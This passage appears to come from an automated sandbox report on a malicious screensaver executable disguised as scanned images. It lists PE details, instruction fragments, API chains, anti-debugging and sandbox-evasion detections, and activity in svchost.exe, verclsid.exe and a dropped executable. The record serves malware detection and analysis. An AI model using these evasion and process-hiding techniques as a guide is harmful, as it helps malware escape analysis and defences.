                Source: Binary string: verclsid.pdbGCTL source: svchost.exe, 00000001.00000003.1798236689.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829844647.0000000003200000.00000004.00000020.00020000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000002.3548785048.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3550509142.000000000568C000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2126594180.000000000FEAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: verclsid.pdb source: svchost.exe, 00000001.00000003.1798236689.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829844647.0000000003200000.00000004.00000020.00020000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000002.00000002.3548785048.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3550509142.000000000568C000.00000004.10000000.00040000.00000000.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3549816270.000000000333C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2126594180.000000000FEAC000.00000004.80000000.00040000.00000000.sdmp
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004542DE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00470A76 push ecx; ret 0_2_00470A89
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E80C push edx; iretw 1_2_0041E831
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418036 push edx; retf 1_2_0041803B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D0FD push edx; retf 1_2_0040D121
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E898 push edx; iretw 1_2_0041E831
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411953 push FFFFFFCFh; iretd 1_2_00411974
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031A0 push eax; ret 1_2_004031A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418215 push esp; iretd 1_2_00418217
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040C32C push eax; iretd 1_2_0040C32E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413B38 push ebp; retf 1_2_00413B4E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D3EA push ebp; ret 1_2_0040D3EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413BF6 push cs; iretd 1_2_00413BF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401DE2 push eax; retf 1_2_00401DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A6D5 push eax; retf 1_2_0041A6DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404EBD push edi; ret 1_2_00404EF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404F00 push edi; ret 1_2_00404EF7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004177C5 pushfd ; retn F88Bh1_2_004177C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D7EB push es; iretd 1_2_0040D7F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390225F pushad ; ret 1_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039027FA pushad ; ret 1_2_039027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD push ecx; mov dword ptr [esp], ecx1_2_039309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390283D push eax; iretd 1_2_03902858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03901368 push eax; iretd 1_2_03901369
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050627FA pushad ; ret 3_2_050627F9
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0506225F pushad ; ret 3_2_050627F9
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050909AD push ecx; mov dword ptr [esp], ecx3_2_050909B6
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0506283D push eax; iretd 3_2_05062858
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05061368 push eax; iretd 3_2_05061369
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0302E7B0 push FFFFFFCFh; iretd 3_2_0302E7D1
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_03034622 pushfd ; retn F88Bh3_2_0303461F
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_030325CE push ds; retf 3_2_030325D9
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0046F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0046F98E
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004E1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004E1C41
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-95967
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeAPI/Special instruction interceptor: Address: 1573774
                Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\verclsid.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416628 rdtsc 1_2_00416628
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeAPI coverage: 3.6 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\verclsid.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\verclsid.exe TID: 7724Thread sleep count: 48 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exe TID: 7724Thread sleep time: -96000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe TID: 7904Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe TID: 7904Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe TID: 7904Thread sleep time: -34000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe TID: 7904Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\verclsid.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C68EE FindFirstFileW,FindClose,0_2_004C68EE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_004C698F
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004BD076
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004BD3A9
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C9642
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C979D
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_004C9B2B
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_004BDBBE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_004C5C97
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0303C650 FindFirstFileW,FindNextFileW,FindClose,3_2_0303C650
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004542DE
                Source: zalkpCfMwtnpQo.exe, 00000007.00000002.3548850540.000000000149F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                Source: verclsid.exe, 00000003.00000002.3548335775.0000000003385000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2127771986.000001110FEAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416628 rdtsc 1_2_00416628
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417733 LdrLoadDll,1_2_00417733
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004CEAA2 BlockInput,0_2_004CEAA2
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00482622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00482622
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004542DE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00474CE8 mov eax, dword ptr fs:[00000030h]0_2_00474CE8
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_015723D0 mov eax, dword ptr fs:[00000030h]0_2_015723D0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_015739E0 mov eax, dword ptr fs:[00000030h]0_2_015739E0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_01573A40 mov eax, dword ptr fs:[00000030h]0_2_01573A40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928397 mov eax, dword ptr fs:[00000030h]1_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E388 mov eax, dword ptr fs:[00000030h]1_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]1_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395438F mov eax, dword ptr fs:[00000030h]1_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov ecx, dword ptr fs:[00000030h]1_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE3DB mov eax, dword ptr fs:[00000030h]1_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h]1_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D43D4 mov eax, dword ptr fs:[00000030h]1_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EC3CD mov eax, dword ptr fs:[00000030h]1_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A3C0 mov eax, dword ptr fs:[00000030h]1_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039383C0 mov eax, dword ptr fs:[00000030h]1_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B63C0 mov eax, dword ptr fs:[00000030h]1_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F0 mov eax, dword ptr fs:[00000030h]1_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039663FF mov eax, dword ptr fs:[00000030h]1_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039403E9 mov eax, dword ptr fs:[00000030h]1_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C310 mov ecx, dword ptr fs:[00000030h]1_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A08324 mov eax, dword ptr fs:[00000030h]1_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A08324 mov ecx, dword ptr fs:[00000030h]1_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A08324 mov eax, dword ptr fs:[00000030h]1_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A08324 mov eax, dword ptr fs:[00000030h]1_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950310 mov ecx, dword ptr fs:[00000030h]1_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A30B mov eax, dword ptr fs:[00000030h]1_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov ecx, dword ptr fs:[00000030h]1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B035C mov eax, dword ptr fs:[00000030h]1_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA352 mov eax, dword ptr fs:[00000030h]1_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8350 mov ecx, dword ptr fs:[00000030h]1_2_039D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B2349 mov eax, dword ptr fs:[00000030h]1_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D437C mov eax, dword ptr fs:[00000030h]1_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0634F mov eax, dword ptr fs:[00000030h]1_2_03A0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]1_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E284 mov eax, dword ptr fs:[00000030h]1_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0283 mov eax, dword ptr fs:[00000030h]1_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]1_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402A0 mov eax, dword ptr fs:[00000030h]1_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov ecx, dword ptr fs:[00000030h]1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C62A0 mov eax, dword ptr fs:[00000030h]1_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A2C3 mov eax, dword ptr fs:[00000030h]1_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039402E1 mov eax, dword ptr fs:[00000030h]1_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A062D6 mov eax, dword ptr fs:[00000030h]1_2_03A062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392823B mov eax, dword ptr fs:[00000030h]1_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A250 mov eax, dword ptr fs:[00000030h]1_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936259 mov eax, dword ptr fs:[00000030h]1_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h]1_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA250 mov eax, dword ptr fs:[00000030h]1_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov eax, dword ptr fs:[00000030h]1_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8243 mov ecx, dword ptr fs:[00000030h]1_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0274 mov eax, dword ptr fs:[00000030h]1_2_039E0274
